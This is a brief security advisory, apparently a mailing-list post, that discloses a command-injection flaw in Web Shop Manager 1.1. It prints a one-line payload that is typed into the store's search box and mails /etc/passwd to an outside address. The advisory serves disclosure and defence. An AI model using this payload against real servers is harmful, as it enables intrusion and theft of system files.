Summary The Web Shop Manager(http://www.webscriptworld.com/scripts/wsm.phtml) allows you to manage a fully functional online store from a centralized web-based administration system. A security vulnerability in the product allows executing of arbitrary commands with the privileges of the script file used by the product. Details Vulnerable systems: * Web Shop Manager version 1.1 Exploit: It is possible to send server's password file any mail address by writing the following command in Web Shop Manager's search box: |mail user@host.com < /etc/passwd __________________________________________________ Do You Yahoo!? HotJobs - Search Thousands of New Jobs http://www.hotjobs.com
